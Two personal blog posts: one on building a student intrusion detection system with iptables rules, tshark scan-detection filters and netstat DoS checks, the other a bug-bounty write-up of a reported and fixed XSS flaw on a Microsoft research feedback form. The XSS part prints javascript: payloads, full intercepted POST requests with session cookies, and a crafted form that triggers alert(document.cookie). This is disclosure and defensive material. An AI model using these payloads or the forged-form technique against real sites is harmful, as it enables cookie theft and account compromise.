Tuesday, 5 January 2016

CTRL+C, +V (Copy Paste) Best Idea To Build Capstone Projects

Hii again...
Hope you liked my previous post "Post XSS At : research.microsoft.com".

Finally it's the 8th semester; the 4 years of fun were going to end in the next 5 months, and the gang decided to attend the first day's class on time as a ritual. Professors were well aware that there would be full strength on the first day, the last day & the day before exams, so they were ready with their A-Bomb for students.
This time the A-Bomb was "Capstone Project": the 10-credit, game-changing, 5-month task that either puts your grades inside a tombstone or raises them above the stars. So we heard about the task, and within a week we had to make a 4-5 person group and choose a project & mentors.

The group was made in less than a minute, but choosing the project was a tough call, so we decided to come up with as many ideas as possible in the next 3 days. On the 3rd day the team members gathered in class and contributed their ideas, e.g. a shopping website, a social networking website, Skype-like software, Google Drive-like systems etc...

NOTE : Personal advice to students out there looking for projects :
1. Always choose a project that no one else is making. [ Different Project ]
2. The project should sound complex and tough to understand but be the easiest to program.

So, we thought about the above guidelines and dropped the idea of making websites or software, because they were so common and similar among other students, & came to the conclusion that we were going to make a project related to cyber security, as security would be the least considered among other students and professors.

But in cyber security we came across many projects like RAT, Anti-Virus, DMZ etc...
The projects were awesome, but the problem was practical implementation. E.g. if we made a RAT (Remote Administration Tool), the main task was to get a remote connection to our victim PC. That was easy if the victim had disabled their firewall & anti-virus, but while giving a viva to professors there would be no point saying "we have to disable the firewall of the victim." It would be a huge fail for the team. So, we went with the easiest one in the book, called "IDS" (Intrusion Detection System). It was a perfect project: it sounds difficult, but once you understand the concept it is easy to code.

As a developer the biggest question after choosing the project was 3W1H....?????
How to start ?
When to start ?
Where we should start from ?
Who will start ?
The solution in the books was simply SDLC (Systems Development Life Cycle), but it only works when you know what you are going to start. We only had an idea that IDS means "Intrusion Detection System" & its work is to detect an intruder, e.g. if an attacker is trying to get access to our system we should get an alert of his presence.
So, ignoring the SDLC concept, we started working blind, on a problem-followed-by-solution basis. Now the ultimate problem was how to code? Which programming language should we choose?
The answer was: make it as simple as you can for users & other programmers to understand, so we chose Perl & Linux bash scripting.

The week passed, we registered our project & chose our mentor. The deadline for our first month's report was near and we hadn't started our project. We had to show the interface and the features of our project. By then we knew what we had to do; we categorized our system into four:
1. Firewall
2. Honeypot
3. DOS Detection  
4. Logs Management

& came up with the interface. Our main objective was to create simple scripts for each category.
Eg. For firewall : IP, Port blocking etc...


Month 1st, we wrote simple scripts for the Firewall like :
1. Blacklisting IP Address
2. Blacklisting MAC Address
3. Blacklisting Ports
4. Block Website
5. Block Ads
6. Backdoor scanner
7. Trojans scanner

We used simple tricks for building these scripts, like...
for blacklisting IP, MAC, Ports we used the iptables command :

1. IP Blocking :
 iptables -A INPUT -s $ip -j DROP 

2. MAC Blocking : 
iptables -A INPUT -m mac --mac-source $mac -j DROP
iptables -A FORWARD -m mac --mac-source $mac -j DROP


3. Ports Blocking :
 iptables -A INPUT -p tcp --destination-port $Po -j DROP

4. Ads Block :
Parsing the IPs from http://www.spamhaus.org/drop/drop.lasso & blocking them with iptables.

5. Backdoor Scanner
Comparing known backdoor signatures with the source of the file we want to scan.

6. Blocking Website
using the simple DNS hosts file IP blocking concept
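The "Ads Block" step above parses a DROP-style list and feeds each network to iptables. The script below is an added example, not the project's own Perl or bash code: it parses the `<CIDR> ; <SBL id>` line format of that list, rejects anything that is not a valid IPv4 network before it gets anywhere near a command line, and builds the same `iptables -A INPUT -s ... -j DROP` rules the post uses (with the SBL id kept as a rule comment). The sample list text and its SBL ids are constructed placeholders, not a real download.

```python
"""Added example: parse a Spamhaus DROP-style list and build iptables DROP rules.

Format assumed (one entry per line): "<CIDR> ; <SBL id>", where ";" starts a
comment.  The sample text below is constructed, not a real download.
"""
import ipaddress
import shlex
import subprocess

# Constructed sample in the drop.lasso layout; the SBL ids are placeholders.
SAMPLE_DROP_LIST = """\
; Spamhaus DROP List (constructed sample for illustration)
; Last-Modified: Tue, 05 Jan 2016 00:00:00 GMT
192.0.2.0/24 ; SBL000001
198.51.100.0/24 ; SBL000002
198.51.100.77/24 ; SBL000003
203.0.113.0/24 ; SBL000004
bogus-entry ; SBL000005
"""


def parse_drop_list(text):
    """Return a list of (ip_network, sbl_id) for every well-formed IPv4 entry.

    Comment and blank lines are skipped.  Anything that is not a valid CIDR
    with the host bits clear (198.51.100.77/24 above) is dropped rather than
    passed on, so malformed or tampered input never reaches iptables.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        cidr, _, comment = line.partition(";")
        try:
            net = ipaddress.ip_network(cidr.strip(), strict=True)
        except ValueError:
            continue
        if net.version != 4:
            continue  # iptables is IPv4 only; IPv6 entries would need ip6tables
        entries.append((net, comment.strip()))
    return entries


def iptables_rules(entries, chain="INPUT"):
    """Build one argv list per network: the post's 'iptables -A INPUT -s $ip -j DROP',
    with the list's SBL id attached via the comment match so rules stay traceable."""
    rules = []
    for net, sbl_id in entries:
        rules.append(["iptables", "-A", chain, "-s", str(net),
                      "-m", "comment", "--comment", sbl_id or "drop-list",
                      "-j", "DROP"])
    return rules


def apply_rules(rules, dry_run=True):
    """Print the commands, or run them (needs root) when dry_run is False."""
    for argv in rules:
        if dry_run:
            print(shlex.join(argv))
        else:
            subprocess.run(argv, check=True)


if __name__ == "__main__":
    apply_rules(iptables_rules(parse_drop_list(SAMPLE_DROP_LIST)))
```

Passing each rule as an argv list (not a shell string) means a poisoned list line can never smuggle extra shell syntax into the command, which is the main thing to get right in a script that turns downloaded text into root-level commands.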




Month 2nd: Creating a Honeypot.
The simplest way to understand a honeypot is: pretend to be vulnerable to attackers' attacks & trap the attacker at the time of the attack.


How to build a trap ?

Think like an attacker. An attacker always does footprinting and scanning before launching his attack; it's simple, if you do not know about the target you can't move further.

so, we built a simple trap called PSAD (Port Scan Attack Detection).
In this, if an attacker tries to use different types of Nmap scan on our system, we will get an alert with the IP address doing that scan.

The trick was to use a network sniffer, e.g. Wireshark or Tshark, and create a rule to look for specific TCP flags in the packets that are coming from the attacker's side.

tshark -i $fa -f "ip proto 6 or ip proto 17" -R "tcp.flags == 16 or tcp.flags == 1 or tcp.flags == 2 or tcp.flags == 18 or tcp.flags == 41 or tcp.flags == 16 or tcp.flags == 0 or ip.len == 28 or icmp.type == 8"   

You must be wondering what the above tshark command is for. OK, the trick was to view all Nmap scans in detail and check which TCP flags were used for scanning.

Eg. TCP Flags With Decimal Numbers Assigned :
FIN = 1
SYN = 2
RST = 4
PSH = 8
ACK = 16
URG = 32
ECE = 64
CWR = 128


Different types of scan using TCP flags that you can filter out using tshark.

TCP Connect Scan
Filter : ip.proto == 6 and tcp.flags == 18

TCP SYN Scan
Filter : ip.proto == 6 and tcp.flags == 2

TCP FIN Scan
Filter : ip.proto == 6 and tcp.flags == 1

TCP XMAS Scan
Filter : ip.proto == 6 and tcp.flags == 41

TCP NULL Scan
Filter : ip.proto == 6 and tcp.flags == 0

TCP ACK Scan
Filter : ip.proto == 6 and tcp.flags == 16

UDP Scan
Filter : ip.proto == 17 and ip.len == 28
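The flag table and filter list above are what a detector keys on. The script below is an added example, not the project's PSAD script: it decodes numeric tcp.flags values into flag names, maps each value to the scan type in the table, and only raises an alert for a source whose matching probes spread across many ports. That last step is the check worth adding, because SYN, ACK and SYN/ACK segments also occur in every legitimate connection (and the SYN/ACK in the connect-scan filter is the host's own reply), so a single flag match is not evidence of a scan. The packet records are constructed, not captured traffic.

```python
"""Added example: classify TCP probes by flag value and flag port-scan sources.

The flag values and scan-type mapping mirror the post's tshark filters; the
packet records below are constructed, not captured traffic.
"""
from collections import defaultdict

FIN, SYN, RST, PSH, ACK, URG, ECE, CWR = 1, 2, 4, 8, 16, 32, 64, 128
FLAG_NAMES = [(FIN, "FIN"), (SYN, "SYN"), (RST, "RST"), (PSH, "PSH"),
              (ACK, "ACK"), (URG, "URG"), (ECE, "ECE"), (CWR, "CWR")]

# tcp.flags value -> scan type, as in the post's filter list
SCAN_TYPES = {
    SYN: "TCP SYN scan",
    SYN | ACK: "TCP connect scan (SYN/ACK, the host's own reply)",
    FIN: "TCP FIN scan",
    FIN | PSH | URG: "TCP XMAS scan",
    0: "TCP NULL scan",
    ACK: "TCP ACK scan",
}


def decode_flags(value):
    """Turn a numeric tcp.flags value into its set bits, e.g. 18 -> ['SYN', 'ACK']."""
    return [name for bit, name in FLAG_NAMES if value & bit]


def classify(value):
    """Name the scan type a flag value matches, or None for ordinary traffic."""
    return SCAN_TYPES.get(value & 0xFF)


def detect_scanners(packets, min_ports=10):
    """Report sources whose matching probes touched at least min_ports ports.

    packets: iterable of (src_ip, dst_port, tcp_flags).  A single SYN or ACK
    is what every client sends too, so the per-source port spread, not the
    flag value alone, is what separates a scanner from a normal peer.
    """
    ports = defaultdict(set)
    kinds = defaultdict(set)
    for src, dport, flags in packets:
        kind = classify(flags)
        if kind is None:
            continue
        ports[src].add(dport)
        kinds[src].add(kind)
    return {src: {"ports": len(p), "scan_types": sorted(kinds[src])}
            for src, p in ports.items() if len(p) >= min_ports}


# Constructed sample: one host sweeping 30 ports with SYN plus one XMAS probe,
# and one ordinary client that only ever talks to port 443.
SAMPLE_PACKETS = (
    [("198.51.100.7", port, SYN) for port in range(1, 31)]
    + [("198.51.100.7", 80, FIN | PSH | URG)]
    + [("192.0.2.10", 443, SYN), ("192.0.2.10", 443, ACK)] * 5
)

if __name__ == "__main__":
    for src, info in detect_scanners(SAMPLE_PACKETS).items():
        print(f"ALERT {src}: {info['ports']} ports probed, "
              f"{', '.join(info['scan_types'])}")
```

To run this against live traffic, feed it the same three fields from a tshark line (`-T fields -e ip.src -e tcp.dstport -e tcp.flags`); the threshold of ten ports is an assumed starting point to tune per host.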



Month 3rd: Writing scripts for DoS / DDoS detection & log management.


1. ARP Poisoning Check
The trick was to compare the original gateway MAC with the MAC seen after the attack starts.
Command used : arp -a $ip

Create a program that first stores the original MAC (MAC1), then compares it with the current MAC (MAC2):
if MAC1 == MAC2, no poisoning
else
poisoning is in process

2. HTTP DDoS Check
while true; do
  check=$(netstat -nap | grep HTTP | wc -l)
  if [ "$check" -gt 20 ]; then echo "Possible HTTP DDoS: $check connections"; fi
  sleep 5
done

If netstat is showing connections from different IP addresses requesting the server at the same time, a DDoS is in process.

3. UDP DoS Check
while true; do
  check=$(netstat -anp | grep 'udp' | wc -l)
  if [ "$check" -gt 20 ]; then echo "Possible UDP DoS: $check sockets"; fi
  sleep 5
done

If netstat is showing connections from different IP addresses requesting the server at the same time, a DDoS is in process.

4. TCP / IP DoS
use netstat -anp | grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n | wc -l to count the distinct remote IPs for both tcp & udp

5. SYN DoS Check
while true; do
  check=$(netstat -nap | grep SYN | wc -l)
  if [ "$check" -gt 20 ]; then echo "Possible SYN flood: $check half-open connections"; fi
  sleep 5
done

If netstat is showing connections from different IP addresses requesting the server at the same time, a DDoS is in process.
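The ARP check and the netstat-based DoS checks above each reduce to parsing one command's output and applying a threshold. The script below is an added example, not the project's bash scripts: it parses `netstat -nap` lines into records, applies the post's three checks (too many SYN_RECV sockets, too many distinct UDP peers, too many distinct clients on the HTTP ports) with the same threshold of 20, and compares the gateway MAC reported by `arp -a` against a stored baseline (MAC1 vs MAC2). Both command outputs are constructed to match the real layout; nothing here was captured from a live system.

```python
"""Added example: netstat-based DoS checks and an arp -a gateway-MAC baseline check.

All command output below is constructed in the layout of netstat -nap and
arp -a; it was not captured from a live host.
"""
import re

SAMPLE_NETSTAT = "\n".join(
    ["Active Internet connections (servers and established)",
     "Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name"]
    # 25 half-open connections from 25 different sources: a SYN flood on port 80
    + [f"tcp        0      0 10.0.0.5:80             203.0.113.{i}:4{i:04d}      SYN_RECV    -"
       for i in range(1, 26)]
    + ["tcp        0      0 10.0.0.5:80             192.0.2.10:51000        ESTABLISHED 1234/apache2",
       "tcp        0      0 10.0.0.5:22             192.0.2.11:50222        ESTABLISHED 987/sshd",
       "udp        0      0 10.0.0.5:53             192.0.2.12:40000        5555/named",
       "udp        0      0 0.0.0.0:123             0.0.0.0:*               2222/ntpd"]
)


def parse_netstat(text):
    """Return (proto, local_ip, local_port, remote_ip, state) per socket line."""
    records = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5 or not fields[0].startswith(("tcp", "udp")):
            continue
        proto = fields[0]
        local_ip, _, local_port = fields[3].rpartition(":")
        remote_ip, _, _ = fields[4].rpartition(":")
        # udp lines have no State column, so field 6 is PID/Program there
        state = fields[5] if proto.startswith("tcp") and len(fields) > 5 else ""
        records.append((proto, local_ip, local_port, remote_ip, state))
    return records


def check_floods(records, threshold=20):
    """The post's three checks: SYN_RECV count, distinct UDP peers, distinct HTTP clients."""
    syn_half_open = sum(1 for r in records if r[4] == "SYN_RECV")
    udp_peers = {r[3] for r in records
                 if r[0].startswith("udp") and r[3] not in ("0.0.0.0", "*", "::")}
    http_clients = {r[3] for r in records
                    if r[0].startswith("tcp") and r[2] in ("80", "443")}
    return {
        "syn_flood": syn_half_open > threshold,
        "udp_flood": len(udp_peers) > threshold,
        "http_flood": len(http_clients) > threshold,
        "syn_recv": syn_half_open,
        "http_clients": len(http_clients),
    }


# Matches the "(ip) at mac" part of an arp -a line on Linux.
ARP_LINE = re.compile(r"\((?P<ip>[\d.]+)\) at (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})", re.I)


def gateway_mac(arp_output, gateway_ip):
    """Extract the MAC that arp -a currently reports for the gateway, or None."""
    for m in ARP_LINE.finditer(arp_output):
        if m.group("ip") == gateway_ip:
            return m.group("mac").lower()
    return None


def arp_poisoned(baseline_mac, arp_output, gateway_ip):
    """MAC1 == MAC2 means no poisoning; a changed or vanished entry is an alert."""
    return gateway_mac(arp_output, gateway_ip) != baseline_mac.lower()


# Constructed arp -a output before and after the gateway entry changes.
ARP_BEFORE = "_gateway (192.168.1.1) at aa:bb:cc:dd:ee:01 [ether] on eth0\n"
ARP_AFTER = "_gateway (192.168.1.1) at de:ad:be:ef:00:02 [ether] on eth0\n"

if __name__ == "__main__":
    print(check_floods(parse_netstat(SAMPLE_NETSTAT)))
    print("ARP poisoned:", arp_poisoned("aa:bb:cc:dd:ee:01", ARP_AFTER, "192.168.1.1"))
```

Counting distinct remote addresses rather than raw line counts is what makes the HTTP check match the post's stated rule ("different IP addresses ... at the same time"); the raw `wc -l` approach also fires on one busy legitimate client.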

6. Ping of Death Check

Sniff the network & check the size of the ICMP packets (payload size)

tshark -i wlan0 -R "icmp.type == 8" -c 200


Log Management :

In log management, syslog and commands like stat, faillog, last etc. were used.

The following Linux log files were watched, checked for updates & modification :

/var/log/lastlog, /var/log/telnetd, /var/run/utmp, /var/log/secure, /root/.ksh_history,
/root/.bash_history, /root/.bash_logut, /var/log/wtmp, /etc/wtmp, /etc/utmp, /var/log,
/var/adm, /var/apache/log, /var/apache/logs, /usr/local/apache/logs, /var/log/acct,
/var/log/xferlog, /var/log/messages/, /var/log/proftpd/xferlog.legacy,
/var/log/proftpd.xferlog, /var/log/proftpd.access_log, /var/log/httpd/error_log,
/var/log/httpsd/ssl_log, /var/log/httpsd/ssl.access_log, /etc/mail/access,
/var/log/qmail, /var/log/smtpd, /var/log/samba, /var/lock/samba, /root/.Xauthority,
/var/log/poplog, /var/log/news.all, /var/log/spooler, /var/log/news, /var/log/news/news,
/var/log/news/news.all, /var/log/news/news.crit, /var/log/news/news.err,
/var/log/news/news.notice, /var/log/news/suck.err, /var/log/news/suck.notice,
/var/spool/tmp, /var/spool/errors, /var/spool/logs, /var/spool/locks,
/usr/local/www/logs/thttpd_log, /var/log/thttpd_log, /var/log/ncftpd/misclog.txt,
/var/log/nctfpd.errs, /var/log/auth



So finally, after 3 months, we had completed our Project & started making the Report.

Link For Report   : http://www.slideshare.net/raghavbisht9/personal-final-report 
Download Project : https://github.com/raghav007bisht/Intrusion-Detection-System-IDS-v5.0

Monday, 4 January 2016

Post XSS At : "research.microsoft.com"

Hii
I am Raghav & this is the story of how I managed to get my name on the Microsoft Security Researcher Acknowledgements for Microsoft Online Services (November 2015).

NOTE : I am writing my first post, plus I'm not a literature guy, so do ignore any typos & grammatical errors in my story.

Link : https://technet.microsoft.com/en-in/security/cc308589.aspx


I started my journey in January 2015 when I was working as a Security Consultant & one day I thought "what the fuck am I doing with my life?" & started asking myself some life-changing questions. Although I had some experience & knowledge, as I had been having fun with hacking stuff since 2008. I was studying at high school then and liked to deface websites for fun, make viruses, use cryptography for cheating in exams & the list goes on...

so, I looked in the mirror & cursed the world & decided to switch from Security Consultant to Freelancer.
Now, if you are starting as a freelancer and you do not have any connections, congratulations: "You Are Screwed !!!".
Your own parents will curse you, as you stick to them like a parasite, and your friends plus others will give you uncountable bullshit advice.

So, putting all their advice in the trash, I started looking for Bug Bounty Programs & I registered myself at HackerOne, Bugcrowd, Cobalt etc... and started looking for public programs on vulnerability-lab, but the biggest mistake I made was that I started using vulnerability scanners, and they gave me millions of false positives plus hundreds of duplicate results/reports and wasted exactly 2 months of my time...:(

Now, after being pinned to the ground & losing many times, I took my faith away from vulnerability scanners & started believing in myself and switched to manual vulnerability testing. As I was going to start testing, I had to choose a target from hundreds of publicly available programs. At that time I had started working with Python programming, so I opened the Python interpreter and made a random character generation program, 4 lines of easy code;
Here it goes ;
>>> import random
>>> import string
>>> a = string.ascii_letters
>>> random.choice(a)
Output : "w"

Now, I started searching for bounty programs starting with the letter "w" in "http://www.vulnerability-lab.com/list-of-bug-bounty-programs.php"
& I chose the first target "Wamba" out of the other 10 programs.


After around 2-3 days of manual testing I got my first verified XSS bug, which paid off $150 & a Hall of Fame.
Link :  http://corp.wamba.com/en/developer/security/?fame

So, finally I got a start...
Now one thing I knew for sure was that I had to give my best if I was to find bugs at top-level dinosaurs like Microsoft, Google, Facebook etc...
so I started hunting for small fish in the pond for practice, and I got many.

NOTE : Check my LinkedIn profile for those fish : https://in.linkedin.com/in/raghav-bisht-8a99b049

After exactly 8 months of practice & learning I chose Microsoft as my first target. You must be wondering why Microsoft? Because of its Bug Bounty scope. Their scope is wide, as they are running bug bounties for online services, products like Office, etc...

As my expertise is in web applications, I chose to go with their Online Services. Now I had to choose the target, as there are hundreds of domains, sub-domains etc. out there. Having a paranoia of being lucky, I again opened my random Python program & this time it gave the letter "R".
so I scanned for sub-domains of Microsoft using the Acunetix sub-domain scanner tool & I got a domain "http://research.microsoft.com/en-us/"

Now, testing begins...

On November 3rd 2015, morning 2:19 AM, I reported my first bug to Microsoft. That was "Open Redirection"


And I failed....:(

Now on the same day, November 3rd 2015, afternoon 1:27 PM, I reported a verified XSS bug to Microsoft.

NOTE : Exactly the same report :


Vulnerable Domain :
--------------------------------

http://research.microsoft.com/

Vulnerable Link :
---------------------------

http://research.microsoft.com/apps/mobile/feedback.aspx

Vulnerable Parameter :
-------------------------------------

hiddenReferer=

XSS Payload :
---------------------

javascript:alert(123456789)
javascript:alert(document.domain)
javascript:alert("XSS____ALERT_____!!!!_____:_____Hacked___By___Raghav")

Steps To Reproduce :
------------------------------

1. Go to vulnerable Link : http://research.microsoft.com/apps/mobile/feedback.aspx
2. Put data in the form and click on submit; meanwhile add a proxy & intercept the HTTP request.
Then,
Find the vulnerable parameter : hiddenReferer=
&
Put XSS Payload : javascript:alert(123456789)
3. Forward the request...

Original Request :
--------------------------

POST /apps/mobile/feedback.aspx HTTP/1.1
Host: research.microsoft.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://research.microsoft.com/apps/mobile/feedback.aspx
Cookie: MC1=GUID=22a3cdbfa8d5904b942b60e36305e4eb&HASH=bfcd&LV=201508&V=4&LU=1441034037093; A=I&I=AxUFAAAAAAAeCQAApxclCNxGFk+1KDeEOKYm2A!!&V=4; MUID=3CE4D5FFCA896F5712EFDDF4CB966E2D; _vis_opt_s=2%7C; _vis_opt_exp_1025_exclude=1; MSFPC=ID=22a3cdbfa8d5904b942b60e36305e4eb&CS=3&LV=201509&V=1; km_ai=FA8dlGEvWq66GJiPA83Nhvzj9mY%3D; km_uq=; km_lv=x; R=200234933-9/14/2015 12:18:26; WT_FPC=id=220af3c63b6e33379221442103020970:lv=1446427090307:ss=1446427090307; WT_NVR_RU=0=technet:1=:2=; omniID=1445758143494_c04d_29d1_3dca_05f32aa0d277; MC0=1446534979732; MS0=64028a0f7e8a4846ac5da7cca81d6ddc
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 452

__VIEWSTATE=%2FwEPDwUJLTgzMTg5OTc5ZGShzpE5tzmEw6CKkKDvGHntFLidc5imff8w7mu2zy%2FLMQ%3D%3D&__VIEWSTATEGENERATOR=716BEBFC&__EVENTVALIDATION=%2FwEdAARKJNO6sKLVvRzw7zztCu4VtMM203w3pCXVfEXN8x4O0jpn2Pr6XjNySqjv2083yVfNgUlRChClrK8AcSkpyD8s%2Fz5WZ7D4I2h2W9EhPlJLX2gF%2BinlORjyb3MDfBMo%2F9Y%3D&ctl00%24bodyPlaceholder%24hiddenReferer=&Content=1&Design=2&Usability=3&Overall=4&ctl00%24bodyPlaceholder%24commentTxt=asadas&ctl00%24bodyPlaceholder%24submitBtn=Submit

Edited Request :
-------------------------

POST /apps/mobile/feedback.aspx HTTP/1.1
Host: research.microsoft.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://research.microsoft.com/apps/mobile/feedback.aspx
Cookie: MC1=GUID=22a3cdbfa8d5904b942b60e36305e4eb&HASH=bfcd&LV=201508&V=4&LU=1441034037093; A=I&I=AxUFAAAAAAAeCQAApxclCNxGFk+1KDeEOKYm2A!!&V=4; MUID=3CE4D5FFCA896F5712EFDDF4CB966E2D; _vis_opt_s=2%7C; _vis_opt_exp_1025_exclude=1; MSFPC=ID=22a3cdbfa8d5904b942b60e36305e4eb&CS=3&LV=201509&V=1; km_ai=FA8dlGEvWq66GJiPA83Nhvzj9mY%3D; km_uq=; km_lv=x; R=200234933-9/14/2015 12:18:26; WT_FPC=id=220af3c63b6e33379221442103020970:lv=1446427090307:ss=1446427090307; WT_NVR_RU=0=technet:1=:2=; omniID=1445758143494_c04d_29d1_3dca_05f32aa0d277; MC0=1446534979732; MS0=64028a0f7e8a4846ac5da7cca81d6ddc
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 470

__VIEWSTATE=%2FwEPDwUJLTgzMTg5OTc5ZGTXCl2373301Rpe5vIISbXvtNenkjedT%2Bw1VGl4ldsRqw%3D%3D&__VIEWSTATEGENERATOR=716BEBFC&__EVENTVALIDATION=%2FwEdAAR2zlRPRPhJi19IJ5naZBSPtMM203w3pCXVfEXN8x4O0jpn2Pr6XjNySqjv2083yVfNgUlRChClrK8AcSkpyD8sBCl6HiMzAgi%2F4d3G3Luo2MkPYCKPbIHIh3MWPVPWxGM%3D&ctl00%24bodyPlaceholder%24hiddenReferer=javascript:alert(123456789)&Content=1&Design=2&Usability=3&Overall=4&ctl00%24bodyPlaceholder%24commentTxt=m&ctl00%24bodyPlaceholder%24submitBtn=Submit

Response :
------------------

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 03 Nov 2015 07:23:06 GMT
Content-Length: 8961

NOTE : POC Attached...!!!



And I failed again....:(

Now, as we all know, every story has 3 sections: the start, the mid & the "twist".

As my bug was shut down by the MSRC team & they said it was a "SELF-XSS", I had to make my bug impactful. For doing so,

1. I checked for the X-Frame-Options header in the response and checked whether the website can be framed inside an HTML <IFRAME> tag.

2. Always check with the document.cookie XSS payload <script>alert(document.cookie)</script>. In my case the document.cookie payload didn't work because I had not registered on the website & my browser did not contain any session. So, this was my mistake; then I registered on the site & applied the document.cookie payload, and the "Cookie" pop-up box appeared, which helped me increase the severity of the bug.

 

SO, my only task left was to make my bug severity as high as possible. For doing so;
Check out the exact words of my 3rd reply to the MSRC team...

Respected...
As per POC for my earlier mail...
That the POST XSS page can be created and it can be Exploited...[Source : http://blog.portswigger.net/2007/03/exploiting-xss-in-post-requests.html]
Steps To Reproduce For POST XSS Exploitation :
------------------------------------------------------------------------------


1. Save the vulnerable Page in local system : http://research.microsoft.com/apps/mobile/feedback.aspx
2. Edit source code and add :

</p><form name="aspnetForm" method="post" action="http://research.microsoft.com/apps/mobile/feedback.aspx" id="aspnetForm">

<input name="ctl00$bodyPlaceholder$hiddenReferer" id="ctl00_bodyPlaceholder_hiddenReferer" type="hidden" value="javascript:alert(document.cookie)">

3. Run the page in the local system & click on submit.
4. When the form is successfully submitted, click on "Hyperlinked : Click" to execute the XSS payload.
Conclusions :
---------------------

1. Attacker can host the page and ask for feedback.
2. Missing "X-Frame-Options: sameorigin" header in the response can give an advantage to the attacker for an XFS attack [Source : https://www.owasp.org/index.php/Cross_Frame_Scripting] [ POC Screenshot Attached : XFS-Microsoft.png ]
NOTE : Video POC, Screenshots & Edited POST Request Page Is Attached...!!!


Video POC : https://www.youtube.com/watch?v=uokq33ssLdc
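The two findings in the reply above (a `javascript:` value in hiddenReferer ending up in a clickable link, and no X-Frame-Options header) point at what the server side has to do. The code below is an added example written from the defender's side; it is not Microsoft's code and not the fixed page. It accepts a return-to value only when it is an http(s) URL on an allow-listed host or a site-relative path, falls back to a default otherwise, attribute-escapes the value before it is rendered into the "Click" link, and returns the anti-framing headers the reply asks for. The allowed host and default path are assumptions.

```python
"""Added example (not Microsoft's code): server-side handling for a return-to
parameter like hiddenReferer, plus the framing headers the bug report asks for.

A javascript: value must never reach an href.  Only same-site http(s) URLs or
site-relative paths are accepted; anything else falls back to a default page.
The allow-listed host and default path below are assumptions.
"""
import html
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"research.microsoft.com"}   # assumed allow-list
DEFAULT_RETURN = "/apps/mobile/"               # assumed fallback page


def safe_return_url(value, allowed_hosts=ALLOWED_HOSTS, default=DEFAULT_RETURN):
    """Return value if it is a same-site http(s) URL or a site-relative path, else default."""
    if not isinstance(value, str):
        return default
    # Drop whitespace and C0 control characters first: a browser still treats
    # 'java\tscript:' as the javascript: scheme, so the check must see it whole.
    cleaned = "".join(ch for ch in value.strip() if ord(ch) > 0x1F)
    parts = urlsplit(cleaned)
    if parts.scheme in ("http", "https") and parts.hostname in allowed_hosts:
        return cleaned                       # absolute URL on an allowed host
    if (parts.scheme == "" and parts.netloc == ""
            and cleaned.startswith("/") and not cleaned.startswith("//")):
        return cleaned                       # site-relative path, not "//other-host"
    return default


def back_link_html(value):
    """Render the post-submit 'Click' link with a validated, attribute-escaped href."""
    return '<a href="%s">Click</a>' % html.escape(safe_return_url(value), quote=True)


def security_headers():
    """Headers that stop the page being framed from another origin (the XFS point)."""
    return {"X-Frame-Options": "SAMEORIGIN",
            "Content-Security-Policy": "frame-ancestors 'self'"}


if __name__ == "__main__":
    for candidate in ("javascript:alert(123456789)", "//evil.example/",
                      "http://research.microsoft.com/en-us/", "/apps/mobile/feedback.aspx"):
        print(repr(candidate), "->", back_link_html(candidate))
    print(security_headers())
```

Checking `parts.hostname` rather than doing a substring match on the string is what defeats values like `http://research.microsoft.com@evil.example/`, where the allowed name appears as userinfo; the escaping on output is a separate layer, since a validated value that is still attribute-unsafe would otherwise break out of the href.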

So Finally On November 17th 2015 I got the confirmation of Bug Fixed...




Thank You....!!!!



- Raghav Bisht
